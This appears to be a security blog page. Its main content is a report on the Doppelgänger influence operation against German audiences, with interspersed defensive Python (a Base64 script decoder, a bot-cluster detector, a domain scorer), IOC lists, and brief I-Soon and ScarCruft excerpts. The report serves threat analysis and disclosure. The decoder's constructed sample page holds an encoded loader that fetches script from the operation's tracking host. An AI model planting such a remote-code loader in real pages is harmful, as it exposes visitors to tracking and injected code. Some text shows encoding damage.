โŒ

Normal view

There are new articles available, click to refresh the page.
Before yesterdaySentinelLabs

Doppelgänger | Russia-Aligned Influence Operation Targets Germany

22 February 2024 at 13:55

Executive Summary

  • SentinelLabs and ClearSky Cyber Security have been tracking the activities of a suspected Russia-aligned influence operation network named Doppelgänger.
  • We observed Doppelgänger intensively targeting German audiences, coinciding with recent reports from the German Ministry of Foreign Affairs and Der Spiegel.
  • The network spreads propaganda and disinformation through news articles focused on current socio-economic and geopolitical topics relevant to the general population.
  • Doppelgänger disseminates content criticizing the ruling government coalition and its support for Ukraine, likely aiming to influence public opinion before the upcoming elections in Germany.
  • Doppelgänger leverages a substantial network of X accounts, actively participating in coordinated activities to enhance visibility and engage audiences.

Overview

SentinelLabs and ClearSky Cyber Security have been tracking a propaganda and disinformation campaign since late November 2023, highly likely orchestrated by Doppelgänger, a suspected Russia-aligned influence operation network known for its persistent and aggressive tactics. Initially focusing on disseminating anti-Ukraine content following the onset of the Russo-Ukrainian conflict, Doppelgänger has since broadened its scope, targeting audiences in the US, Israel, Germany, and France.

We observed a significant emphasis by Doppelgänger on targeting German audiences. The network’s activities are characterized by consistent efforts to disseminate propaganda and disinformation content, particularly by exploiting current topics of geopolitical and socio-economic significance among the population. The majority of the content seizes every opportunity to criticize the ruling government coalition and its support for Ukraine.

With Doppelgänger activities intensifying in times of frequent political shifts in Germany, we suspect that the network’s goal is to erode support for the coalition in light of upcoming European Parliament, municipal, and federal state elections, culminating in federal government elections scheduled for 2025.

While we were documenting the Doppelgänger campaign, the German Ministry of Foreign Affairs and the prominent German media outlet Der Spiegel reported on overlapping activities, highlighting a growing concern about election interference.

In this post, we supplement existing reporting by providing additional technical indicators and insights into Doppelgänger’s tactics and disseminated content, with the ultimate goal of further heightening public awareness of this threat.

This report focuses on Doppelgänger activities targeting German audiences; a complementary report by ClearSky Cyber Security delves into the network’s targeting of Israel, the United States, and Ukraine. The activities we observed closely resemble and partially overlap with those previously reported by Recorded Future and Meta, indicating the persistent nature of Doppelgänger.

We observed Doppelgänger orchestrating the operation of a large coordinated network of X (formerly known as Twitter) accounts. These accounts propagate content from third-party websites whose content aligns with Doppelgänger propaganda goals, as well as from sites that Doppelgänger itself has created.

The majority of the X accounts we discovered as part of our investigation had not been deactivated at the time of writing. In an effort to maximize visibility and audience engagement, these accounts participate in coordinated activities, such as regularly posting and reposting content from highly popular profiles, as well as engaging with posts from other suspected Doppelgänger-managed accounts.

The posts from these accounts contain links that redirect visitors through two stages to the destination articles intended for consumption. These stages implement obfuscation and tracking techniques. Coupled with the carefully constructed infrastructure management practices we observed Doppelgänger implementing, this underscores the network’s determination to operate without interruptions while effectively tracking the performance of its influence operations.

Redirection Stages

The first-stage websites, which Doppelgänger distributes on X, use thumbnail images hosted at telegra[.]ph to obfuscate the website thumbnails and redirect to second-stage sites.

First-stage website

The second-stage websites contain text unrelated to the campaign and execute a JavaScript code obfuscated using Base64-encoding.

Second-stage website

The JavaScript code samples we analyzed issue a request to ggspace[.]space (reported as part of previous Doppelgänger campaigns) or sdgqaef[.]site. The request carries tracking information, which is likely a campaign identifier. These identifiers follow the format [country]-[day]-[month]_[domain], where [domain] is the domain hosting the destination article (for example, DE-02-01_deintelligenz for an article hosted at deintelligenz[.]com). The IOC table at the end of this post lists some of the campaign identifiers we observed.

Second-stage website: Deobfuscated JavaScript code

In addition, the script executed by the second-stage websites dynamically loads a further script from ggspace[.]space or sdgqaef[.]site, which implements the logic for generating the web content that redirects to a destination article.

JavaScript code from sdgqaef[.]site

sdgqaef[.]site and ggspace[.]space both host a login page at the /admin URL path, which we assess belongs to the Keitaro Tracking System (a commercial traffic distribution system). Doppelgänger possibly uses Keitaro to track the effectiveness of its campaigns.

Login page hosted at sdgqaef[.]site
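The two-stage chain described above leaves two things a defender can pull out of a captured second-stage page without executing it: the Base64-wrapped script and the campaign identifier it sends to the tracking host. The following Python is an added example, not code from the post or from Doppelgänger: it decodes every atob('...') literal in a page, checks whether the decoded script contacts ggspace[.]space or sdgqaef[.]site, and parses any campaign identifier it finds using the grammar inferred from the IOC list (the -<variant> and _<suffix> parts cover identifiers such as DE-23-12-2_arbeitspause and FR-19-01_bfmtv_s). The sample page is constructed, and the "campaign" query parameter name is an assumption, since the post does not show the real request format.

```python
import base64
import re
from typing import Optional

# Hosts the post identifies as the redirection/tracking back end.
TRACKING_HOSTS = {"ggspace.space", "sdgqaef.site"}

# Campaign identifier grammar inferred from the IOC list at the end of the post:
#   <country>-<day>-<month>[-<variant>]_<domain>[_<suffix>]
#   e.g. DE-02-01_deintelligenz, DE-23-12-2_arbeitspause, FR-19-01_bfmtv_s
CAMPAIGN_RE = re.compile(
    r"^(?P<country>[A-Z]{2})-(?P<day>\d{2})-(?P<month>\d{2})"
    r"(?:-(?P<variant>\d+))?_(?P<domain>[a-z0-9-]+)(?:_(?P<suffix>[A-Za-z0-9-]+))?$"
)
CAMPAIGN_IN_JS_RE = re.compile(r"[A-Z]{2}-\d{2}-\d{2}(?:-\d+)?_[a-z0-9-]+(?:_[A-Za-z0-9-]+)?")
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def decode_atob_payloads(html: str) -> list[str]:
    """Decode every atob('...') literal in the page source; skip literals that are not Base64."""
    payloads = []
    for m in ATOB_RE.finditer(html):
        try:
            payloads.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return payloads


def parse_campaign_id(cid: str) -> Optional[dict]:
    """Split a campaign identifier into fields, or return None if it does not fit the grammar."""
    m = CAMPAIGN_RE.match(cid)
    if not m:
        return None
    f = m.groupdict()
    return {
        "country": f["country"],
        "day": int(f["day"]),
        "month": int(f["month"]),
        "variant": int(f["variant"]) if f["variant"] else None,
        "domain": f["domain"],
        "suffix": f["suffix"],
    }


def analyse_second_stage(html: str) -> dict:
    """Report the tracking hosts the decoded scripts contact and the campaign IDs they carry."""
    hosts, campaigns = set(), []
    for js in decode_atob_payloads(html):
        hosts.update(h.lower() for h in HOST_RE.findall(js) if h.lower() in TRACKING_HOSTS)
        for cid in CAMPAIGN_IN_JS_RE.findall(js):
            parsed = parse_campaign_id(cid)
            if parsed:
                campaigns.append(parsed)
    return {"tracking_hosts": sorted(hosts), "campaigns": campaigns}


# Constructed sample page, not a copy of a real second-stage site: filler text plus an
# eval(atob(...)) wrapper around a loader that calls a tracking host. The "campaign"
# query parameter name is an assumption; the post does not show the real request format.
_INNER_JS = (
    "var id='DE-02-01_deintelligenz';"
    "var s=document.createElement('script');"
    "s.src='https://sdgqaef.site/loader.js?campaign='+id;"
    "document.head.appendChild(s);"
)
SAMPLE_SECOND_STAGE = (
    "<html><body><p>Unrelated filler text about houseplants.</p>"
    "<script>eval(atob('" + base64.b64encode(_INNER_JS.encode()).decode() + "'));</script>"
    "</body></html>"
)

if __name__ == "__main__":
    print(analyse_second_stage(SAMPLE_SECOND_STAGE))
```

Decoding statically rather than loading the page keeps the analyst's IP out of the Keitaro statistics; the second-stage page is itself a tracking beacon, so every visit from a research network is a datapoint the operators can see.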

Social Media Activities

Probably in an attempt to increase their visibility, some of the suspected Doppelgänger-managed X accounts we identified regularly post content that does not necessarily link to first-stage websites, whereas others remain idle for relatively long periods.


An active and an idle suspected Doppelgänger account

We observed accounts posting content linking to first-stage sites in multiple languages of the targeted audiences. Further, the Doppelgänger account network is probably attempting to increase, in a targeted manner, the engagement metrics of posts that link to first-stage websites through reposts and views. This becomes evident when these metrics are compared with those of posts by the same accounts that do not link to first-stage websites.

Multi-language posts tailored to the targeted audiences
Engagement metric discrepancies

We identified multiple clusters of suspected Doppelgänger-managed accounts that joined the X platform within the same month. We observed a significant level of coordination in the activities of the accounts within the same cluster, suggesting centralized control. This includes reposting the same content at almost the same time, typically that of highly popular profiles. In addition, posts that link to first-stage sites by suspected Doppelgänger accounts within the same cluster often have very similar engagement metrics.


Coordinated activities
Engagement metric similarities

Our analysis of the engagement metrics for almost all the accounts we identified revealed a range of reposts between 700 and 2000, with a median value of 883, and a range of views between 613 and 14000, with a median value of 5000.
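The coordination signals described above (accounts created in the same month, near-simultaneous reposts of the same popular content) can be turned into a simple clustering check. The following Python is an added example and not SentinelLabs tooling; it runs over a constructed set of repost records with invented handles, links two accounts whenever they repost the same item within a short window, merges links seen on at least two distinct items into clusters, and reports the join month of each cluster's members. The window and threshold are assumptions to tune against real data.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from itertools import combinations


def coordinated_clusters(reposts, window=timedelta(minutes=2), min_shared=2):
    """Group accounts that repeatedly repost the same item within `window` of one another.

    reposts: iterable of (account, joined_month, item_id, repost_time).
    Two accounts are linked when they repost the same item within `window`; links seen
    on at least `min_shared` distinct items are merged into clusters (union-find).
    """
    by_item = defaultdict(list)
    joined = {}
    for account, joined_month, item, ts in reposts:
        by_item[item].append((ts, account))
        joined[account] = joined_month

    # For each account pair, collect the items on which they reposted near-simultaneously.
    pair_items = defaultdict(set)
    for item, events in by_item.items():
        events.sort()
        for (t1, a1), (t2, a2) in combinations(events, 2):
            if a1 != a2 and t2 - t1 <= window:
                pair_items[tuple(sorted((a1, a2)))].add(item)

    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for (a, b), items in pair_items.items():
        if len(items) >= min_shared:
            ra, rb = find(a), find(b)
            if ra != rb:
                parent[ra] = rb

    groups = defaultdict(set)
    for account in list(parent):
        groups[find(account)].add(account)
    return [
        {"accounts": sorted(g), "joined": sorted({joined[a] for a in g})}
        for g in sorted(groups.values(), key=lambda g: sorted(g))
        if len(g) > 1
    ]


# Constructed sample, not real observations: handles are invented. Three accounts created
# in the same month repost two popular posts within seconds of each other; an older
# account reposts hours later; a fourth same-month account overlaps only once.
T0 = datetime(2024, 1, 10, 9, 0, 0)
SAMPLE_REPOSTS = [
    # (account, joined YYYY-MM, reposted item, time of repost)
    ("acct_a1", "2023-11", "popular_post_1", T0),
    ("acct_a2", "2023-11", "popular_post_1", T0 + timedelta(seconds=20)),
    ("acct_a3", "2023-11", "popular_post_1", T0 + timedelta(seconds=45)),
    ("acct_b1", "2021-03", "popular_post_1", T0 + timedelta(hours=3)),
    ("acct_c1", "2023-11", "popular_post_2", T0 + timedelta(hours=1, seconds=10)),
    ("acct_a1", "2023-11", "popular_post_2", T0 + timedelta(hours=1)),
    ("acct_a2", "2023-11", "popular_post_2", T0 + timedelta(hours=1, seconds=30)),
    ("acct_a3", "2023-11", "popular_post_2", T0 + timedelta(hours=1, seconds=50)),
    ("acct_b1", "2021-03", "popular_post_3", T0 + timedelta(days=1)),
]

if __name__ == "__main__":
    for cluster in coordinated_clusters(SAMPLE_REPOSTS):
        print(cluster)
```

Requiring a link to recur on several distinct items is what separates a bot cluster from the organic burst of reposts that any viral post attracts; a single coincidence, like acct_c1 above, is not enough on its own.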

Propaganda and Disinformation Content

Doppelgänger has been very active in creating websites that host articles for consumption by targeted audiences through the previously described multi-stage approach. Among these sites, there are domains and websites impersonating third-party news outlets, which includes mimicking their design, structure, and domain names, such as welt[.]pm (inauthentic) vs. welt[.]de (authentic) and faz[.]ltd (inauthentic) vs. faz[.]net (authentic). We assess that the rest of the websites we observed have been created by Doppelgänger with original design and structure and no indications of impersonating established news platforms.

In most cases, we observed consistent and regular publishing of new content, with only occasional idle periods lasting a few days at most. Some of the content consists of a blend of materials sourced from other websites and translated into the languages of the targeted audiences.

A closer look at the custom-built websites indicates that Doppelgänger has been making a fast-paced effort to bring its websites online and start distributing content. For example, some sites include template text or exhibit errors in search functionalities. Furthermore, nearly all of these websites lack social media presence. They display icons of social media platforms that link to the domains of these platforms rather than specific profiles.

Template text (emphasis added)

Many of the custom-built websites have been built and are managed using the WordPress content management system. We observed that some websites display status messages in Russian when users perform content searches and the activity fails with an error, indicating the use of Russian-language WordPress components.

WordPress status message translates to “Search for”

The majority of the articles Doppelgänger distributes have a strong anti-government narrative, especially in regard to the government’s support of Ukraine. The article snippets we present below are machine-translated from German into English.

An article at arbeitspause[.]org discusses a recent series of strikes by workers in the German public transport demanding better wages and better working conditions. The challenges relating to the state of workers in this sector, such as rising living costs due to inflation and shortage of workers, are a pressing concern in Germany that captures the attention of the broader population.

Article snippet from arbeitspause[.]org, referencing Scholz, the German chancellor (emphasis added)

On a similar note, another article at arbeitspause[.]org focuses on the recent strikes by German farmers, which involved the blockade of major roads and were motivated by rising living costs and the government’s plan to phase out agricultural subsidies. Overlapping at times with the strikes in the public transport sector, the farmers’ strikes have been disrupting mobility and therefore garnered the attention of the population and mass media. Doppelgänger has attempted to capitalize on the momentum by criticizing the government’s plan regarding agricultural subsidies, drawing a connection to the government’s support for Ukraine.

Article snippet from arbeitspause[.]org

An article at derglaube[.]com focuses on the German immigration policy, which, according to some polls, ranks among the top issues for voters in Germany. In addition, the media frequently covers topics relating to the government’s allocation of funds for immigration-related programs and services. Consistent with typical Doppelgänger practices, the influence operation network uses this opportunity to cast the government in a negative light and introduce its support for Ukraine into the narrative.

Article snippet from derglaube[.]com (original emphasis)
Article snippet from derglaube[.]com (emphasis added)

In an attempt to blend politically oriented propaganda or disinformation with other topics, some websites host articles covering broader subjects such as health, sports, and culture. We observed attempts to introduce propaganda even in such articles. For example, an article hosted at miastagebuch[.]com initially discusses headaches from a medical perspective, only to later name the German government as one of the major causes of headaches.

Anti-government statements in a health-themed article (emphasis added)

We emphasize that Doppelgänger also targets Germany through articles published by third-party outlets, such as telepolis[.]de, freiewelt[.]net, overton-magazin[.]de, and deutschlandkurier[.]de.

The articles from these outlets that Doppelgänger disseminates focus on both domestic and international topics, some with a strong anti-Western narrative. For instance, an article from overton-magazin[.]de portrays the West as profiteering from the Russo-Ukrainian conflict, while depicting Ukraine as a “plaything of Western global players” (quoting the article).

Article snippet from overton-magazin[.]de (emphasis added)

Additionally, an article from osthessen-news[.]de highlights factors such as the Ukraine war and inflation as contributors to economic challenges in Germany, prompting medium-sized companies to consider restructuring due to escalating costs. Issues concerning small- and mid-sized companies are particularly relevant to the broader German audience, given their significant contribution to the country’s overall economy.

Article snippet from osthessen-news[.]de

Infrastructure

The Doppelgänger infrastructure can be divided into four parts, each subject to different management and control practices and each hosting a different element of the chain that delivers content to targeted audiences: the first-stage redirection websites, the second-stage redirection websites, the servers likely used for monitoring campaign performance (ggspace[.]space and sdgqaef[.]site), and the destination websites.

The first-stage and second-stage websites often shift between a variety of hosting providers, such as Hostinger, Global Internet Solutions, and DigitalOcean. The domains of these websites typically have short lifespans, lasting only several days at a time and recurring multiple times over a few years. We observe that Doppelgänger activates the domains for brief periods during its campaigns before deactivating them again.

The domains of the first-stage websites span a diverse range of top-level domains (TLDs), including generic TLDs such as .buzz, .art, .store, .site, and .online, as well as country code TLDs like .co.uk and .br. The domains’ format suggests an automated generation approach involving the creation of subdomains and numerical suffixes, for example, pcrrjx.kredit-money-fun169[.]buzz and yzrhhk.kredit-money-fun202[.]buzz.

This strategy, combined with the frequent rotation between hosting providers and the cyclical nature of the domains, indicates an effort by Doppelgänger to evade detection and tracking of its first-stage infrastructure, which is exposed on social media platforms and therefore more likely to be subjected to scrutiny. Doppelgänger does not apply the same domain naming convention to second-stage websites, which are not directly exposed on social media platforms.
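The naming pattern above lends itself to a lightweight domain triage rule. The following Python is an added example, not tooling from the post: it scores a domain on the features the post describes (a six-character machine-looking leftmost label, a hyphenated keyword stem with a numeric suffix, and one of the listed TLDs) and runs it over domains from the IOC list mixed with constructed benign names. The point weights and thresholds, the tiny stand-in for the public suffix list, and the inclusion of .lol (taken from the IOC list rather than the post's prose) are my assumptions; treat the output as a triage hint, not attribution.

```python
import re

# Minimal stand-in for the public suffix list; a real tool would use the full list.
PUBLIC_SUFFIXES = {"co.uk", "com.br"}
# TLDs named in the post for first-stage domains, plus .lol from the IOC list.
SUSPECT_TLDS = {"buzz", "art", "store", "site", "online", "lol"}
VOWELS = set("aeiou")


def split_domain(domain: str):
    """Return (subdomain labels, registrable label, public suffix) for a plain or defanged domain."""
    labels = domain.lower().replace("[.]", ".").strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in PUBLIC_SUFFIXES:
        suffix, rest = ".".join(labels[-2:]), labels[:-2]
    else:
        suffix, rest = labels[-1], labels[:-1]
    if not rest:
        return [], "", suffix
    return rest[:-1], rest[-1], suffix


def first_stage_score(domain: str) -> int:
    """Score how closely a domain follows the first-stage naming pattern (higher = closer)."""
    subs, sld, suffix = split_domain(domain)
    score = 0
    if subs and re.fullmatch(r"[a-z0-9]{6}", subs[0]):
        # Six-character leftmost label; digits or a vowel-less string look machine-generated.
        looks_random = any(c.isdigit() for c in subs[0]) or not (set(subs[0]) & VOWELS)
        score += 2 if looks_random else 1
    if re.search(r"\d{1,3}$", sld):  # numeric suffix, as in kredit-money-fun169
        score += 1
    if "-" in sld:  # hyphenated keyword stem
        score += 1
    if suffix in SUSPECT_TLDS:
        score += 1
    return score


def verdict(domain: str) -> str:
    """Map the score to a triage label; thresholds are an assumption, not a calibrated cut-off."""
    score = first_stage_score(domain)
    if score >= 3:
        return "likely first-stage pattern"
    return "review" if score == 2 else "no match"


# Domains from the post's IOC list (first- and second-stage) mixed with constructed benign names.
SAMPLE_DOMAINS = [
    "pcrrjx.kredit-money-fun169[.]buzz",
    "yzrhhk.kredit-money-fun202[.]buzz",
    "nice-credits-list266[.]buzz",
    "62ogyy[.]internetbusinesslondon[.]co[.]uk",
    "nw3m7o.samaritana.com[.]br",
    "v5yoaq.chilling[.]lol",
    "arizztar[.]com",
    "static.example.com",
    "news.bbc.co.uk",
]

if __name__ == "__main__":
    for d in SAMPLE_DOMAINS:
        print(f"{d:45} score={first_stage_score(d)} {verdict(d)}")
```

The first-stage names on ordinary registrable domains under .co.uk and .com.br only reach "review": a random six-character subdomain is a weak signal by itself, which is also why the second-stage domains in the IOC list (arizztar[.]com and the like) score zero, matching the post's observation that the naming convention is not applied to them.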

Playing a central role in Doppelgänger’s campaigns, ggspace[.]space and sdgqaef[.]site are responsible for both redirection and presumably monitoring campaign performance. They are hosted behind a cloud-based reverse proxy infrastructure, likely implemented as a security measure to obfuscate their true hosting locations. In contrast to the first-stage and second-stage domains, the active periods of these domains typically span several months during Doppelgänger’s campaigns.

Many of the servers hosting the destination websites are managed using cPanel, and some implement geofencing, which restricts traffic to IP addresses from targeted countries. This practice is likely intended to minimize exposure of their infrastructure and content to scrutiny and monitoring by researchers or authorities outside those regions, reducing the likelihood of detection and investigation into Doppelgรคngerโ€™s activities.

The domains of the majority of these websites were first registered in the first quarter of 2023 and some as early as mid-2022, remaining active as of the time of writing. A smaller subset of domains, such as derglaube[.]com, which we assess with high confidence as being managed by Doppelgรคnger at this time, have been active for nearly 10 years, with intermittent periods of inactivity lasting a few years at most.

Conclusions

Doppelgänger represents an active instrument of information warfare, characterized by strategic use of propaganda and disinformation to influence public opinion. The campaign targeting Germany we discussed in this post serves as a compelling example of the persistent and continually evolving nature of Russia-aligned influence operations, which exploit social media and current topics of geopolitical and socio-economic significance to shape perceptions.

We anticipate that Doppelgänger’s activities, targeting not only Germany but also other Western countries, will persist and evolve, particularly in light of the major elections scheduled across the EU and the USA in the coming years. We expect Doppelgänger to continue innovating its infrastructure and obfuscation tactics to make its activities more difficult to detect and disrupt.

We emphasize that countering influence operations requires a comprehensive and collaborative approach, involving enhancing public awareness and media literacy to identify and resist manipulation, alongside prompt and effective actions by social media platforms and infrastructure operators to limit the spread of propaganda and disinformation online.

SentinelLabs continues to monitor Doppelgänger activities and remains committed to timely reporting on its operations to improve public awareness of this threat and mitigate its impact.

Indicators of Compromise

Due to the extensive volume of observed indicators, we present here only a selection, including indicators from parallel campaigns targeting France alongside those targeting German audiences.

Domains

Value Note
09474w.reyt-cre-ad34[.]buzz First-stage website
1wifsq.c-majac-ann4[.]buzz First-stage website
3wk8wa.kariz-good-ad10[.]buzz First-stage website
62ogyy[.]internetbusinesslondon[.]co[.]uk First-stage website
6fmb3r[.]great-cred195[.]buzz First-stage website
allons-y[.]social Doppelgänger-managed destination website
antiwar[.]com Third-party website whose articles Doppelgänger disseminates
arbeitspause[.]org Doppelgänger-managed destination website
arizztar[.]com Second-stage website
bfmtv[.]com Third-party website whose articles Doppelgänger disseminates
bluetoffee-books[.]com Second-stage website
brennendefrage[.]com Doppelgänger-managed destination website
buegym.ranking-kariz108[.]buzz First-stage website
contre-attaque[.]net Third-party website whose articles Doppelgänger disseminates
d6egyr.borafazerfestaoficial[.]online First-stage website
deintelligenz[.]com Doppelgänger-managed destination website
derbayerischelowe[.]info Doppelgänger-managed destination website
derglaube[.]com Doppelgänger-managed destination website
derrattenfanger[.]net Doppelgänger-managed destination website
deutschlandkurier[.]de Third-party website whose articles Doppelgänger disseminates
faridmehdipour[.]com Second-stage website
faz[.]ltd Doppelgänger-managed destination website
freeebooktemplates[.]com Second-stage website
freiewelt[.]net Third-party website whose articles Doppelgänger disseminates
ggspace[.]space Server likely used for monitoring campaign performance
grunehummel[.]com Doppelgänger-managed destination website
histoireetsociete[.]com Third-party website whose articles Doppelgänger disseminates
hungarianconservative[.]com Third-party website whose articles Doppelgänger disseminates
jungefreiheit[.]de Third-party website whose articles Doppelgänger disseminates
kaputteampel[.]com Doppelgänger-managed destination website
ledialogue[.]fr Third-party website whose articles Doppelgänger disseminates
legrandsoir[.]info Third-party website whose articles Doppelgänger disseminates
leparisien[.]re Doppelgänger-managed destination website
lildoxi[.]com Second-stage website
miastagebuch[.]com Doppelgänger-managed destination website
mt-secure-bnk[.]com Second-stage website
nice-credits-list266[.]buzz First-stage website
nw3m7o.samaritana.com[.]br First-stage website
o21obd.reyt-credbest-mx29[.]buzz First-stage website
osthessen-news[.]de Third-party website whose articles Doppelgänger disseminates
overton-magazin[.]de Third-party website whose articles Doppelgänger disseminates
pcrrjx.kredit-money-fun169[.]buzz First-stage website
profesionalvirtual[.]com Second-stage website
realpeoplesreviews[.]com Second-stage website
referendud[.]com Second-stage website
restuapp[.]com Second-stage website
sbl63p.kredit-money-fun274[.]buzz First-stage website
sdgqaef[.]site Server likely used for monitoring campaign performance
sueddeutsche[.]ltd Doppelgänger-managed destination website
telepolis[.]de Third-party website whose articles Doppelgänger disseminates
uncut-news[.]ch Third-party website whose articles Doppelgänger disseminates
v5yoaq.chilling[.]lol First-stage website
voltairenet[.]org Third-party website whose articles Doppelgänger disseminates
wanderfalke[.]net Doppelgänger-managed destination website
welt[.]pm Doppelgänger-managed destination website
www.nachdenkseiten[.]de Third-party website whose articles Doppelgänger disseminates
yzrhhk.kredit-money-fun202[.]buzz First-stage website

Campaign Identifiers

DE-02-01_deintelligenz
DE-09-01_derrattenfanger
DE-13-01_nachdenkseiten_-2
DE-13-01_telepolis_-2
DE-15-11_deutschlandkurier
DE-17-11_jungefreiheit
DE-21-11_freiewelt
DE-23-12-2_arbeitspause
DE-24-11_grunehummel
DE-25-01_brennendefrage
DE-25-01_derglaube
DE-25-01_welt
DE-27-12_faz
DE-27-12_miastagebuch_-2
DE-27-12_sueddeutsche
DE-29-01_derbayerischelowe
FR-03-02_candidat
FR-03-02_lexomnium_-2
FR-04-02_allons-y
FR-13-01_original
FR-19-01_bfmtv_s
FR-23-12-2_franceeteu
FR-23-12-2_leparisien
FR-25-01_la-sante
FR-26-12_hungarianconservative
FR-26-12_lepoint_-2
FR-26-12_voltairenet
FR-27-12_ledialogue
FR-27-12_lesfrontieres

Suspected Doppelgรคnger-managed X/Twitter Accounts

AyniyeMcca18343
Brent8332812692
ButzlaffF6068
chareaterc59681
Chris423806
Dan2082135
elasagev1981744
Equinoxevt4
Eric69112331297
Eric81026324555
izaguine65954
jacksanbac66126
Jermaine1384705
Jim388251815042
Joseph673224507
Kevin1135109
Kristin1039811
Marc182057
Marc1826509
Mark5768674550
MeadowOf43589
MehetabelW87922
MGlasscock91268
Mike3614071710
MingoGerri92116
MissyVoorh3954
MitchamNis5726
MKarg84246
ModestiaH56404
ModestineF72279
MonteroTer52325
MontesRodi62373
moore_tess5916
MorelockSo28285
MorganMcqu33699
MunroHelen78796
MurdockTip96177
myrta53009
NancyOrona49857
NannySpeer51042
NatalaWelb47593
Natasha90680770
NaylorVida41053
NCraighead92692
NFridley71438
Nikki9265841534
NikoliaE39574
NJean52219
NKuehner28951
OClodfelte8787
of_navy23563
of_novelis81275
OlguinElsy987
Oliver1325592
Omar37785134192
Pam807954589169
PauliHarry9140
PegeenD80598
Pete1192428369
Rayshaw78069964
Rounak1685212
Tim298432442090

Unmasking I-Soon | The Leak That Revealed China’s Cyber Operations

Executive Summary

  • I-Soon (上海安洵), a company that contracts for many PRC agencies, including the Ministry of Public Security, Ministry of State Security, and People’s Liberation Army, was subject to a data leak over the weekend of Feb 16th. It is not known who pilfered the information or what their motives were, but this leak provides a first-of-its-kind look at the internal operations of a state-affiliated hacking contractor. The authenticity of the documents is still undecided. While the leak’s contents do confirm public threat intelligence, efforts to corroborate the documents further are ongoing.
  • The leak provides some of the most concrete details seen publicly to date, revealing the maturing nature of China’s cyber espionage ecosystem. It shows explicitly how government targeting requirements drive a competitive marketplace of independent contractor hackers-for-hire.
  • I-Soon, whose employees complain about low pay and gamble over mahjong in the office, appears to be responsible for the compromise of at least 14 governments, pro-democracy organizations in Hong Kong, universities, and NATO. The leaked documents align with previous threat intel on several named threat groups.
  • Victim data and targeting lists, as well as names of the clients who requested them, show a company who competes for low-value hacking contracts from many government agencies. The finding indicates that historical targeting information from Advanced Persistent Threats thought to be PRC contractors does not provide strong guidance on future targets.
  • Machine translation enabled the rapid consumption of leaked data. These tools broadened the initial analysis of the information beyond seasoned China experts with specialized language skills and technical knowledge. This has enabled many more analysts to scan the leaked information and quickly extract and socialize findings. As researchers dig into the voluminous information, domain expertise will be required to understand the complex relationships and implicit patterns between the relevant organizations, companies, and individuals. One upshot is that geographically-specialized analysis will continue to provide distinct value, but the barrier to entry is much lower.

Initial Observations

  1. At 10:19 pm on January 15th, someone, somewhere, registered the email address [email protected]. One month later, on February 16th, an account registered with that email began uploading content to GitHub. Among the files uploaded were dozens of marketing documents, images and screenshots, and thousands of WeChat messages between employees and clients of I-Soon. An analyst based in Taiwan found the document trove on GitHub and shared their findings on social media.
  2. Many of the files are versions of marketing materials intended to advertise the company and its services to potential customers. In a bid to get work in Xinjiang, where China subjects millions of Uyghurs to what the UN Human Rights Council has called genocide, the company bragged about past counterterrorism work. The company listed other terrorism-related targets it had hacked previously as evidence of its ability to perform these tasks, including counterterrorism centers in Pakistan and Afghanistan.
  3. Elsewhere, technical documents demonstrated to potential buyers how the company’s products function to compromise and exploit targets. Listed in the documentation were pictures of custom hardware snooping devices, including a tool meant to look like a power bank that actually passed data from the victim’s network back to the hackers. Other documentation diagrammed some of the inner workings of I-Soon’s offensive toolkit. While none were surprising or outlandish capabilities, they confirmed that the company’s main source of revenue is hacking for hire and offensive capabilities.
  4. The leaked documents provide indicators, such as command-and-control infrastructure, malware, and victimology, which relate to suspected Chinese cyberespionage activities previously observed by the threat intelligence community. Initial observations point to activities spanning a variety of targeted industry sectors and organizations as well as APT groups and intrusion sets, which the threat intelligence community tracks, or has been tracking, as distinct clusters. The extent and strength of the relationships between indicators present in the leaked data and past intrusions are still subject to detailed evaluation.
  5. The selection of documents and chats leaked on GitHub seems meant to embarrass the company, but they also raise key questions for the cybersecurity community. One document lists targeted organizations and the fees the company earned by hacking them. Collecting data from Vietnam’s Ministry of Economy paid out $55,000; other ministries were worth less. Another leaked messaging exchange shows an employee hacking into a university not on the targeting list, only for their supervisor to brush it off as an accident. Employees complained about low pay and hoped to get jobs at other companies, such as Qi An Xin.

Conclusion

The leaked documents offer the threat intelligence community a unique opportunity to reevaluate past attribution efforts and gain a deeper understanding of the complex Chinese threat landscape. This evaluation is essential for keeping up with a complex threat landscape and improving defense strategies.

Extensive sharing of malware and infrastructure management processes between groups makes high-confidence clustering difficult. As demonstrated by the leaked documents, third-party contractors play a significant role in facilitating and executing many of Chinaโ€™s offensive operations in the cyber domain.

For defenders and business leaders, the lesson is plain and uncomfortable. Your organization’s threat model likely includes underpaid technical experts making a fraction of the value they may pilfer from your organization. This should be a wakeup call and a call to action.

ScarCruft | Attackers Gather Strategic Intelligence and Target Cybersecurity Professionals

Executive Summary

  • SentinelLabs observed a campaign by ScarCruft, a suspected North Korean APT group, targeting media organizations and high-profile experts in North Korean affairs.
  • We recovered malware in the planning and testing phases of ScarCruft’s development cycle, presumably intended for use in future campaigns.
  • ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals.
  • ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies.

Overview

In collaboration with NK News, SentinelLabs has been tracking campaigns targeting experts in North Korean affairs from South Korea’s academic sector and a news organization focused on North Korea. We observed persistent targeting of the same individuals over a span of two months. Based on the specific malware, delivery methods, and infrastructure, we assess with high confidence that the campaigns are orchestrated by ScarCruft. Also known as APT37 and InkySquid, ScarCruft is a suspected North Korean advanced persistent threat (APT) group with a long history of targeted attacks against individuals as well as public and private entities, primarily in South Korea.

In addition, we retrieved malware that we assess is currently in the planning and testing phases of ScarCruft’s development cycle and will likely be used in future campaigns. In an interesting twist, ScarCruft is testing malware infection chains that use a technical threat research report on Kimsuky as a decoy document. Kimsuky is another suspected North Korean threat group observed to share operational characteristics with ScarCruft, like infrastructure and C2 server configurations. Given ScarCruft’s practice of using decoy documents relevant to targeted individuals, we suspect that the planned campaigns will likely target consumers of technical threat intelligence reports, like threat researchers, cyber policy organizations, and other cybersecurity professionals.

